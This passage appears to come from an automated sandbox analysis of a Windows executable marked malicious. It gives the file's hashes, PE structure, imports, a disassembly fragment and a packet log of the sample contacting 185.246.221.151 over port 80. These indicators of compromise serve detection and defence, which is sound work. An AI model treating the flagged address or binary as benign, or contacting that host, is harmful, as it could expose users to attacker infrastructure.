                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:true
                          Preview:[ZoneTransfer]....ZoneId=0

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.085071601621051
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:file.exe
                          File size:148992
                          MD5:f39dbbcdcaac9c8d2039b855c752c214
                          SHA1:ab36da0a55feab685587c52bce5268fca7ef0e23
                          SHA256:12675d0f7c4a8d729eda453ad01697b0790f2921258e9befc54cf9327156aa10
                          SHA512:44419723ffbdf3caf47fc0902afd36bccfe66ad60c150333fda1ea62da6410fbebb805ccf61278cd95fd48f7ba23edd06857050ab24d069ab6f3d2a8d1854bb0
                          SSDEEP:3072:MDxDtsHGGH2wUp5zjLf0+p+4vrtWhqyXV5G0pbCA:atuH2/jLfM4vr0quk0p/
                          TLSH:40E3DF157291D033E79794315925C3A26BFAF93228B4C94BB7480B7E4FB12D1BA2B307
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.'.5.I.5.I.5.I.....4.I.+...$.I.+...].I..]2.2.I.5.H...I.+.....I.+...4.I.+...4.I.Rich5.I.................PE..L......a...........

                          File Icon

                          Icon Hash:d4b4b0e8e0eaf0c0

                          Static PE Info

                          General

                          Entrypoint:0x404c97
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:TERMINAL_SERVER_AWARE
                          Time Stamp:0x6183E2E1 [Thu Nov 4 13:40:49 2021 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:0
                          File Version Major:5
                          File Version Minor:0
                          Subsystem Version Major:5
                          Subsystem Version Minor:0
                          Import Hash:2ac0f7085258eff31142b9f87cb0f218

                          Entrypoint Preview

                          Instruction
                          call 00007FF368B207BCh
                          jmp 00007FF368B1A99Dh
                          sub eax, 000003A4h
                          je 00007FF368B1AB44h
                          sub eax, 04h
                          je 00007FF368B1AB39h
                          sub eax, 0Dh
                          je 00007FF368B1AB2Eh
                          dec eax
                          je 00007FF368B1AB25h
                          xor eax, eax
                          ret
                          mov eax, 00000404h
                          ret
                          mov eax, 00000412h
                          ret
                          mov eax, 00000804h
                          ret
                          mov eax, 00000411h
                          ret
                          mov edi, edi
                          push esi
                          push edi
                          mov esi, eax
                          push 00000101h
                          xor edi, edi
                          lea eax, dword ptr [esi+1Ch]
                          push edi
                          push eax
                          call 00007FF368B1BD2Eh
                          xor eax, eax
                          movzx ecx, ax
                          mov eax, ecx
                          mov dword ptr [esi+04h], edi
                          mov dword ptr [esi+08h], edi
                          mov dword ptr [esi+0Ch], edi
                          shl ecx, 10h
                          or eax, ecx
                          lea edi, dword ptr [esi+10h]
                          stosd
                          stosd
                          stosd
                          mov ecx, 00421658h
                          add esp, 0Ch
                          lea eax, dword ptr [esi+1Ch]
                          sub ecx, esi
                          mov edi, 00000101h
                          mov dl, byte ptr [ecx+eax]
                          mov byte ptr [eax], dl
                          inc eax
                          dec edi
                          jne 00007FF368B1AB19h
                          lea eax, dword ptr [esi+0000011Dh]
                          mov esi, 00000100h
                          mov dl, byte ptr [eax+ecx]
                          mov byte ptr [eax], dl
                          inc eax
                          dec esi
                          jne 00007FF368B1AB19h
                          pop edi
                          pop esi
                          ret
                          mov edi, edi
                          push ebp
                          mov ebp, esp
                          sub esp, 0000051Ch
                          mov eax, dword ptr [00422260h]
                          xor eax, ebp
                          mov dword ptr [ebp-04h], eax
                          push ebx
                          push edi
                          lea eax, dword ptr [ebp-00000518h]
                          push eax
                          push dword ptr [esi+04h]
                          call dword ptr [00401170h]
                          mov edi, 00000100h

                          Rich Headers

                          Programming Language:
                          • [ASM] VS2008 build 21022
                          • [ C ] VS2008 build 21022
                          • [IMP] VS2005 build 50727
                          • [C++] VS2008 build 21022
                          • [RES] VS2008 build 21022
                          • [LNK] VS2008 build 21022

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x10a9c0x50.text
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x560000x3050.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x12800x1c.text
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2cd80x40.text
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x10000x23c.text
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x10000x107d40x10800False0.511911103219697data6.098461593221709IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .data0x120000x43f080x10800False0.9390536221590909data7.820995800308699IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rsrc0x560000x30500x3200False0.62859375data5.655023153247635IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                          Resources

                          NameRVASizeTypeLanguageCountry
                          JEBOPOZUSUHARAFA0x584300x55fASCII text, with very long lines (1375), with no line terminatorsRaeto-RomanceSwitzerland
                          RT_ICON0x562b00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0Raeto-RomanceSwitzerland
                          RT_ICON0x569780x568Device independent bitmap graphic, 16 x 32 x 8, image size 0Raeto-RomanceSwitzerland
                          RT_ICON0x56ee00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Raeto-RomanceSwitzerland
                          RT_ICON0x57f880x468Device independent bitmap graphic, 16 x 32 x 32, image size 0Raeto-RomanceSwitzerland
                          RT_STRING0x58b780x2d8dataRaeto-RomanceSwitzerland
                          RT_STRING0x58e500x1fcdataRaeto-RomanceSwitzerland
                          RT_ACCELERATOR0x589900xa0dataRaeto-RomanceSwitzerland
                          RT_GROUP_ICON0x583f00x3edataRaeto-RomanceSwitzerland
                          RT_VERSION0x58a300x148x86 executable not stripped

                          Imports

                          DLLImport
                          KERNEL32.dllOpenMutexW, GetConsoleAliasExesLengthA, CopyFileExA, ReadConsoleOutputCharacterW, CompareStringW, SetVolumeLabelA, FillConsoleOutputAttribute, GetConsoleTitleA, QueryDosDeviceW, EnumCalendarInfoExA, GetProcessPriorityBoost, IsProcessInJob, AddConsoleAliasW, CreateFileW, SetMailslotInfo, GetWindowsDirectoryW, GetModuleHandleA, GlobalLock, CreateDirectoryExW, GetLogicalDriveStringsA, ReadConsoleInputA, FindNextVolumeMountPointW, OpenWaitableTimerA, GetVersionExA, SearchPathA, MoveFileExW, CallNamedPipeW, GetCurrentDirectoryW, GetDriveTypeA, CreateMailslotA, BuildCommDCBAndTimeoutsA, GetProcAddress, LoadLibraryA, LocalAlloc, GetBinaryTypeA, GetCPInfoExW, WriteConsoleOutputA, GetCommandLineA, EnumDateFormatsW, CancelTimerQueueTimer, GetHandleInformation, FindResourceA, CreateJobObjectA, FindFirstVolumeA, GlobalFlags, CreateNamedPipeW, InterlockedIncrement, CloseHandle, CopyFileW, GetComputerNameExA, GetShortPathNameA, FlushFileBuffers, GetLogicalDriveStringsW, InterlockedCompareExchange, EnumCalendarInfoW, GetConsoleAliasExesLengthW, InterlockedExchange, GetNamedPipeHandleStateW, GetModuleHandleW, GetCurrentActCtx, GenerateConsoleCtrlEvent, MoveFileW, AddAtomA, SetThreadPriority, FreeEnvironmentStringsW, SetConsoleTitleW, SetVolumeMountPointW, VirtualAlloc, _hread, EnumResourceLanguagesW, ClearCommBreak, QueryMemoryResourceNotification, GlobalFindAtomA, HeapWalk, SetFilePointer, GetTickCount, EnumSystemCodePagesW, VerifyVersionInfoA, LoadLibraryW, CreateFileA, GetLastError, WideCharToMultiByte, HeapReAlloc, HeapAlloc, HeapFree, UnhandledExceptionFilter, SetUnhandledExceptionFilter, DeleteFileA, GetStartupInfoA, GetCPInfo, InterlockedDecrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, TerminateProcess, GetCurrentProcess, IsDebuggerPresent, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, HeapCreate, VirtualFree, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, SetStdHandle, GetConsoleCP, GetConsoleMode, RtlUnwind, InitializeCriticalSectionAndSpinCount, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, HeapSize, ReadFile
                          GDI32.dllGetCharWidthA, GetCharABCWidthsA
                          WINHTTP.dllWinHttpSetOption

                          Possible Origin

                          Language of compilation systemCountry where language is spokenMap
                          Raeto-RomanceSwitzerland

                          Network Behavior

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Nov 30, 2022 00:12:31.871395111 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:31.898896933 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:31.899008989 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:31.899173021 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:31.899214029 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:31.927711964 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.019617081 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.019654036 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.019699097 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.019731998 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.019763947 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.019814014 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.019828081 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.019865036 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.019881010 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.019922972 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.019973040 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.020023108 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.020193100 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.020194054 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.020194054 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.049228907 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.049278021 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.049432039 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.063112974 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.063162088 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.063194990 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.063226938 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.063270092 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.063287973 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.063287973 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.063322067 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.063375950 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.063420057 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.063424110 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.063476086 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.063510895 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.063527107 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.063576937 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.063594103 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.077265978 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.077397108 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.103285074 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.103332996 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.103414059 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.103981018 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.104018927 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.104049921 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.104083061 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.104089022 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.104115009 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.104135990 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.104149103 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.104181051 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.104212999 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.104257107 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.104283094 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.104289055 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.104435921 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.105029106 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.153188944 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.167846918 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.167993069 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.168015003 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.168034077 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.168060064 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.168078899 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.168123960 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.168191910 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.168214083 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.168236017 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.168257952 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.168283939 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.168302059 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.168308973 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.168322086 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.168344021 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.168376923 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.183612108 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.187916040 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.187942982 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.187997103 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.188143015 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.188165903 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.188286066 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.189188957 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.189212084 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.189233065 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.189255953 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.189276934 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.189282894 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.189299107 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.189321995 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.189342976 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.189347029 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.189364910 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.189372063 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.189450026 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.195622921 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.238928080 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.238960981 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.238984108 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.239007950 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.239039898 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.239101887 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.239113092 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.239130020 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.239145994 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.239171982 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.239192009 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.239207029 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.239208937 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.239231110 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.239247084 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.239257097 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.239300013 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.241362095 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.241476059 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.273077965 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.276601076 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.276627064 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.276674986 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.276699066 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.276700974 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.276738882 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.276740074 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.276765108 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.276787996 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.276788950 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.276813030 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.276892900 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.276985884 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.277009964 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.277066946 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.277146101 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.277169943 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.277307034 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.277350903 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.277376890 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.277570963 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.310657978 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.310805082 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.318439960 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.318469048 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.318494081 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.318525076 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.318557024 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.318581104 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.318614006 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.318638086 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.318648100 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.318676949 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.318677902 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.318711996 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.318732977 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.318736076 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.318767071 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.318783998 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.318808079 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.318825960 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.318833113 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.318922043 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.354988098 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.361836910 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.361860037 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.362005949 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.362159967 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.362185001 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.362215996 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.362236977 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.362238884 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.362272024 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.362283945 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.362293959 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.362327099 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.362341881 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.362377882 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.362416983 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.362453938 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.362531900 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.362552881 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.362556934 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.362610102 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.362643003 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.362664938 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.362730026 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.391321898 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.403471947 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.403493881 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.403822899 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.404855013 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.404876947 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.404994965 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.405138969 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.405160904 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.405235052 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.405559063 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.405693054 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.406518936 CET4971580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.435998917 CET8049715185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.812203884 CET4971680192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.845324993 CET8049716185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.845458031 CET4971680192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.851701021 CET4971680192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.851907015 CET4971680192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.883626938 CET8049716185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.977070093 CET8049716185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:32.977200985 CET4971680192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:32.977226973 CET4971680192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:33.004820108 CET8049716185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:33.030431986 CET4971780192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:33.058593035 CET8049717185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:33.058742046 CET4971780192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:33.058831930 CET4971780192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:33.058873892 CET4971780192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:33.091730118 CET8049717185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:33.180012941 CET8049717185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:33.180177927 CET4971780192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:33.181092024 CET4971780192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:33.208179951 CET8049717185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:33.213339090 CET4971880192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:33.241400957 CET8049718185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:33.241566896 CET4971880192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:33.241688967 CET4971880192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:33.241713047 CET4971880192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:33.271612883 CET8049718185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:33.362689018 CET8049718185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:33.365695000 CET4971880192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:33.366297960 CET4971880192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:33.394857883 CET8049718185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:33.824364901 CET4971980192.168.2.7185.246.221.151
